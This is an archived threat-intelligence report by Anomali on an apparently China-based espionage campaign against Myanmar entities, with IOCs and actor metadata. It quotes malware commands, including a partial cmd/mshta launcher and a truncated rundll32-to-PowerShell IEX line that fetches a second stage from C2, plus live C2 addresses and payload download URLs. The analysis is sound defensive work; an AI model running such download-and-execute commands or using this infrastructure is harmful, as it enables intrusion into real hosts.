{ "id": "0d5b5c93-941e-4626-9f41-9491642202e9", "created_at": "2026-04-06T00:14:37.896735Z", "updated_at": "2026-04-10T03:36:33.796656Z", "deleted_at": null, "sha1_hash": "aac28257e587e06f75001e41e26e0e8214994030", "title": "Unknown China-Based APT Targeting Myanmarese Entities", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2925475, "plain_text": "Unknown China-Based APT Targeting Myanmarese Entities\r\nBy Anomali Threat Research\r\nArchived: 2026-04-02 11:52:51 UTC\r\nThe malicious activity identified by Anomali Threat Research appears to align with techniques that would be used\r\nby a China-based group. Following the Belt and Road Initiative can often result in identifying malicious activity\r\nthat coincides with China-based groups’ Tactics, Techniques, and Procedures (TTPs).\r\nOverviewTargetingTechnical AnalysisConclusionIOCsEndnotes\r\nhttps://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z\r\nPage 1 of 9\n\nAuthored by: Parthiban Rajendran and Gage Mele\r\nInformation cutoff date: 6/19/2020\r\nOverview\r\nAnomali Threat Research has identified malicious activity targeting entities based in Myanmar (Burma) that\r\nappears to have begun in March 2020; this is based on file names and payload compilation times. An unidentified\r\nAdvanced Persistent Threat (APT), very likely China-based, is distributing Windows Shortcut (LNK) files that are\r\nbeing renamed and distributed to multiple targets, likely via spearphishing. Anomali Threat Research found these\r\nLNK files located inside multiple, uniquely-named RAR, TGZ, and ZIP files. The RAR and ZIP files are hosted\r\nhttps://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z\r\nPage 2 of 9\n\non Google Drive, this is very likely a tactic to avoid antivirus detection. The group uses the PowerShell-based,\r\nRed Teaming tool Octopus for Command and Control (C2) communication.\r\nIn addition, Anomali Threat Research found that the LNK file closely resembles the one used by the China-based\r\nAPT, Mustang Panda. Anomali Threat Research does not believe that this group is responsible for this activity.\r\nThis similarity may potentially indicate a sharing of tools, which is common amongst some state-sponsored\r\ngroups, or perhaps a similar tool that is used to target specific geographic regions. At the time of this writing,\r\nAnomali Threat Research cannot attribute this APT activity to any specific group. The renamed LNK files are\r\nshown in Table 1 below.\r\nTargeting\r\nChina-sponsored APT groups are known to target countries in which the government of the People’s Republic of\r\nChina is investing in, as part of its Belt and Road Initiative. This has also been observed by Anomali Threat\r\nResearch analysis of the China-based APT, Mustang Panda. China and Myanmar (Burma) have had multiple\r\ninstances of economic activity and agreements in 2020, as of this writing, and the two countries share a complex\r\nhistory that often resulted in conflict.[1] In January 2020, President Xi Jinping visited Myanmar and State\r\nCounselor Aung San Suu signed 33 agreements concerning projects as part of the Belt and Road Initiative.[2]\r\nChina is also one of the largest investors in Myanmar, accounting for a quarter of all Myanmar’s investment, and\r\nis Myanmar’s largest export partner.\r\n[3]\r\n Anomali Threat Research believes that because of these economic factors,\r\nin addition, to file names and compilation times, similar malicious functionality to previously-attributed China-based groups and geographic location of potential targets, that this activity very likely originates from a China-based source.\r\nPotentially-Targeted Entities\r\nThese possible targets are based specifically on file names identified by Anomali Threat Research.\r\nMyanmar Police Force (MPF)\r\nNational Crisis Management Center (NCMC)\r\nNational League for Democracy (NLD)\r\nOffice of Chief of Military Security Affairs (OCMSA)\r\nThe economic activity between China and Myanmar that is of particular interest to Anomali Threat Research is the\r\nMyanmar Yatai International Holding Group’s, a subsidiary of China’s Yatai Group, investment into the\r\ndevelopment of 25.5 acres in Kayin State, Myanmar.\r\n[4]\r\n There are dubious details concerning the urban\r\ndevelopment in the acreage near the Thailand border, which was approved by the Myanmar Investment\r\nCommission, and discussed by a director of Myanmar’s Directorate of Investment Company Administration\r\n(DICA); who confirmed the land was for 59 villas in three years.[5] In early-March 2020, the Myanmar Yatai\r\nInternational Holding Group claimed that the first phase of development covered 214 acres, instead of the 25.5\r\nacres approved by the government in an area controlled by Kayin State.[6] The claim in March 2020 may be a\r\npotential catalyst, or purposefully alignment, for this campaign.\r\nTable 1 - Renamed LNKs Located inside RAR or ZIP\r\nhttps://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z\r\nPage 3 of 9\n\nFile Name MD5\r\nocmsa[2020]report.rar 916b26f22658ce252531bb4ea43ef4cf\r\nHtoo 2 army research (Mpf 29-03-2020).zip 75b72340d6988ac262cabf923e548952\r\nocmsa Htoo 2 army research (Mpf 29-03-2020).rar 1f89a9d077a9712e6d227ef3cb1faac9\r\nocmsa[30-03-2020].zip 9e1f7e35fb3ae292f478d346d076c274\r\nTechnical Analysis\r\nThreat actors very likely distributing spearphishing emails with links to download an attachment from Google\r\nDrive. Utilizing Google Drive is a known tactic used by actors to evade antivirus and security scanners from\r\nidentifying the malicious files. Once a user navigates to the Drive URL that a ZIP or RAR file that contains a\r\nweaponized Windows Shortcut file will be downloaded on the target host. The LNK file utilized in the campaign\r\ncontains an embedded HTA file with VBscript that, once executed, will drop and run an executable in the\r\nbackground and communicates with the Command and Control (C2).\r\nLNK File Analysis\r\nOnce the user opens the LNK file, the below command gets executed. The command looks for a file that contains\r\n*2020*.LNK and proceeds to execute via mshta.exe.\r\nCommand\r\n /c for %x in (%temp%=%cd%) do for /f \"delims==\" %i in ('dir /s /b \"%x *2020*.LNK\"') do start %TEMP:~\r\nAfter the command execution, it writes an executable named f.exe in the “C:userspublic.exe” directory. The file\r\nf.exe is then executed using Windows Management Instrumentation (WMI) in a hidden window via WMI Tasks.\r\nScreenshot of the LNK file\r\nFigure 2 - Screenshot of the LNK file\r\nIt is worth noting that the LNK file with an embedded HTA file is very similar to Mustang Panda’s initial dropper,\r\nhowever, Anomali Threat Research could not attribute this activity to the group.\r\nThe executable f.exe uses the Living off the Land (LOLbin) technique to launch cmd.exe via the\r\nShellExec_RunDLL function. The below command uses Powershell to download and execute the second stage\r\npayload from the C2 server.\r\n \"C:WindowsSystem32 undll32.exe\" SHELL32.DLL,ShellExec_RunDLL \"cmd.exe\" \"/c powershell IEX (New-Objec\r\nThe downloaded file index is a PowerShell script that was found to be a publicly available Octopus C2\r\nframework agent as shown in Figure 3.[7]\r\nhttps://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z\r\nPage 4 of 9\n\nOctopus C2 agent\r\nFigure 3 - Octopus C2 agent comparison\r\nThe Octopus agent fingerprints the host and sends the collected information back to C2 as part of the encrypted\r\nHTTP header as shown in Figure 4. The Octopus agent can be used to download further payloads or perform\r\nadditional activity onto the infected host.\r\nOctopus agent code\r\nFigure 4 - Snippet of the Octopus agent code\r\nNetwork Pivoting for Additional Samples\r\n193.29.59[.]130\r\nUsing the IP address 193.29.59[.]130 as a pivot point Anomali Threat Research was able to find a new sample\r\nnamed D0CX_OCMSA Russia Army Weppon Ferrence to Thailand Archive.exe from Hybrid-analysis.com as\r\nshown in Figure 5.\r\nNewly Identified Sample\r\nFigure 5 - Screenshot of Newly Identified Sample\r\nThe sample communicates to two C2 IP addresses as shown in Figure 6.\r\n23.106.122.234\r\n193.29.59.130\r\nNewly Observed C2 IP Address\r\nFigure 6 - Newly Observed C2 IP Address\r\n23.106.122.234\r\nUpon pivoting using the IP address 23.106.122.234, Anomali Threat Research was able to identify the\r\nPowerShell-based Octopus agent from the C2 server as shown in Figure 7 below.\r\nNewly Identified Samples Communicating to 23.106.122.234\r\nFigure 7 - Newly Identified Samples Communicating to 23.106.122.234\r\nPivoting via Compilation Timestamp\r\nIn order to find more samples from the campaign, Anomali Threat Research used the compilation timestamp from\r\none of the identified samples 6a1611c1bd34fa3878617ef2905b1d87 which was compiled on\r\n2020-03-10 07:54:26 and shown in Table 2 below.\r\nTable 2 -\r\nhttps://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z\r\nPage 5 of 9\n\nFile Name MD5\r\nCompilation\r\nTimestamp\r\nNo file name observed 4cf56653f28ccd03a78213f0b4cb0075\r\n2020-03-10\r\n07:54:26\r\nList Of Maf President Commander in Chief\r\nwith NLD Election.Exe\r\nfd82b2a1b6479de8e1949c72401c1328\r\n2020-03-10\r\n07:54:26\r\norder545.exe a086fae1cd2a1074ee489535169f1b79\r\n2020-03-10\r\n07:54:26\r\nConclusion\r\nThe malicious activity identified by Anomali Threat Research appears to align with techniques that would be used\r\nby a China-based group. Following the Belt and Road Initiative can often result in identifying malicious activity\r\nthat coincides with China-based groups’ Tactics, Techniques, and Procedures (TTPs). The specificity in file names\r\nassociated with Myanmarese entities, similar LNK functionality to known China-sponsored APTs, as well as\r\neconomic and geographical factors, lead Anomali Threat Research to believe that China-based APT is responsible\r\nfor this campaign.\r\nIOCs\r\nFile Name Hash\r\nocmsa[2020]report.rar 916b26f22658ce252531bb4ea43ef4cf\r\nocmsa[30-03-2020].zip 9e1f7e35fb3ae292f478d346d076c274\r\nocmsa Htoo 2 army research\r\n(Mpf 29-03-2020).rar\r\n1f89a9d077a9712e6d227ef3cb1faac9\r\nHtoo 2 army research (Mpf\r\n29-03-2020).zip\r\n75b72340d6988ac262cabf923e548952\r\nMSAU UPR Facts.Tgz c94135f94ced83e1bb4c4ebf16d66b30\r\nocmsa(30-03-2020).lnk 721a7ddd34d801a883bfc8a1e6349a21\r\nHtoo 2 army research (Mpf\r\n29-03-2020).lnk.lnk\r\n721a7ddd34d801a883bfc8a1e6349a21\r\nf.exe 4754dfaf0a10710c061767acc3adf0e3\r\norder545.exe a086fae1cd2a1074ee489535169f1b79\r\nhttps://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z\r\nPage 6 of 9\n\nD0CX_OCMSA Russia Army\r\nWeppon Ferrence to Thailand\r\nArchive.exe\r\nf8760362de259d8ce4c31c2e9ce1e1392e5eae8262224a517d3accc0ccb9f8d8\r\nList Of Maf President\r\nCommander in Chief with\r\nNLD Election.Exe\r\nfd82b2a1b6479de8e1949c72401c1328\r\nScript.php 1a3683b051356a0d4fef2f8a33cd088c\r\n23.106.122.234 C2\r\n193.29.59.130 C2\r\nThe RAR and ZIP files are downloaded from google drive.\r\nFile Name Download URL\r\nocmsa[2020]report.rar\r\nhttps://drive.google.com/u/0/uc?\r\nid=1WWpgJMZce_yeQd2q5i1z1vUu7_d1rulX\u0026export=download\r\nocmsa Htoo 2 army research\r\n(Mpf 29-03-2020).rar\r\nhttps://drive.google.com/u/0/uc?\r\nid=1WWpgJMZce_yeQd2q5i1z1vUu7_d1rulX\u0026export=download\r\nEndnotes\r\n[1]\r\n Thu Thu Aung and Poppy McPherson, “Myanmar, China ink deals to accelerate Belt and Road as Xi courts and\r\nisolated Suu Kyi,” Reuters, accessed June 18, 2020, published January 18, 2020,\r\nhttps://www.reuters.com/article/us-myanmar-china/myanmar-china-ink-deals-to-accelerate-belt-and-road-as-xi-courts-an-isolated-suu-kyi-idUSKBN1ZH054; Marvin C. Ott, “Myanmar in China’s Embrace,” Foreign Policy\r\nInstitute: Asia Program, accessed June 18, 2020, published January 24, 2020,\r\nhttps://www.fpri.org/article/2020/01/myanmar-in-chinas-embrace/; Laura Zhou, “China sees Myanmar as stepping\r\nstone to Indian Ocean, energy security,” South China Morning Post, accessed June 18, 2020, published January\r\n15, 2020, https://www.scmp.com/news/china/diplomacy/article/3046218/china-sees-myanmar-stepping-stone-indian-ocean-energy-security; Sai Wanna, “Myanmar military accused ethnic Karen armed group of violating\r\ntruce,” Myanmar Times, accessed June 18, 2020, published May 21, 2020,\r\nhttps://www.mmtimes.com/news/myanmar-military-accuses-ethnic-karen-armed-group-violating-truce.html.\r\n[2]\r\n Thu Thu Aung and Poppy McPherson, “Myanmar, China ink deals to accelerate Belt and Road as Xi courts and\r\nisolated Suu Kyi,” Reuters.\r\n[3]\r\n Bloomberg, “Myanmar warns sanctions over Rohingya genocide will push it closer to China and dismisses\r\n‘debt trap’ concerns,” South China Morning Post, accessed June 18, 2020, published January 27, 2020,\r\nhttps://www.scmp.com/news/asia/southeast-asia/article/3047736/myanmar-warns-world-sanctions-over-rohingya-https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z\r\nPage 7 of 9\n\ngenocide-will; Central Intelligence Agency, “EAST ASIA/SOUTHEAST ASIA :: BURMA,” The World Factbook,\r\naccessed June 19, 2020, https://www.cia.gov/library/publications/the-world-factbook/geos/bm.html.\r\n[4]\r\n Nan Lwin, “Myanmar Govt to Probe Contentious Chinese Development on Thai Border,” The Irrawaddy,\r\naccessed June 18, 2020, published June 16, 2020, https://www.irrawaddy.com/news/burma/myanmar-govt-probe-contentious-chinese-development-thai-border.html.\r\n[5]\r\n “INSPECTION OF MYANMAR YATAI INTERNATIONAL HOLDING CO., LTD. AND APEX RUBBER\r\nCO., LTD,” Director of Investment and Company Administration, accessed June 18, 2020, published June 26,\r\n2019; Nyien Nyien, “Chinese Developer’s Grand Claims Spark Fresh Concern in Karen State,” The Irrawaddy,\r\naccessed June 18, 2020, published March 6, 2019, https://www.irrawaddy.com/news/burma/chinese-developers-grand-claims-spark-fresh-concern-karen-state.html.\r\n[6]\r\n Nyien Nyien, “Chinese Developer’s Grand Claims Spark Fresh Concern in Karen State,” The Irrawaddy.\r\n[7]\r\n Octopus, accessed June 19, 2020, https://github.com/mhaskar/Octopus/blob/master/agents/agent.ps1.oct.\r\nIran's Cyber War Machine Hits Full Stride: What CISOs Must Do Right Now\r\nhttps://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z\r\nPage 8 of 9\n\nWhen Federal Cyber Defenses Shrink, State Governments Stand in the Crossfire\r\nIran Cyber War, Day 32: FBI Director Breached, Critical Infrastructure Under Siege, and the\r\nSilence That Should Worry You Most\r\nSource: https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z\r\nhttps://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z" ], "report_names": [ "unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z" ], "threat_actors": [ { "id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0", "created_at": "2022-10-25T15:50:23.710403Z", "updated_at": "2026-04-10T02:00:05.281246Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "Whisper Spider" ], "source_name": "MITRE:Silence", "tools": [ "Winexe", "SDelete" ], "source_id": "MITRE", "reports": null }, { "id": "c91e335e-42be-48d9-96b5-ba56749a723b", "created_at": "2022-10-25T16:07:23.458346Z", "updated_at": "2026-04-10T02:00:04.616481Z", "deleted_at": null, "main_name": "CIA", "aliases": [ "Central Intelligence Agency" ], "source_name": "ETDA:CIA", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7", "created_at": "2025-03-29T02:05:20.764715Z", "updated_at": "2026-04-10T02:00:03.851829Z", "deleted_at": null, "main_name": "GOLD WYMAN", "aliases": [ "Silence " ], "source_name": "Secureworks:GOLD WYMAN", "tools": [ "Silence" ], "source_id": "Secureworks", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "88e53203-891a-46f8-9ced-81d874a271c4", "created_at": "2022-10-25T16:07:24.191982Z", "updated_at": "2026-04-10T02:00:04.895327Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "ATK 86", "Contract Crew", "G0091", "TAG-CR8", "TEMP.TruthTeller", "Whisper Spider" ], "source_name": "ETDA:Silence", "tools": [ "EDA", "EmpireDNSAgent", "Farse", "Ivoke", "Kikothac", "LOLBAS", "LOLBins", "Living off the Land", "Meterpreter", "ProxyBot", "ReconModule", "Silence.Downloader", "TiniMet", "TinyMet", "TrueBot", "xfs-disp.exe" ], "source_id": "ETDA", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434477, "ts_updated_at": 1775792193, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/aac28257e587e06f75001e41e26e0e8214994030.pdf", "text": "https://archive.orkl.eu/aac28257e587e06f75001e41e26e0e8214994030.txt", "img": "https://archive.orkl.eu/aac28257e587e06f75001e41e26e0e8214994030.jpg" } }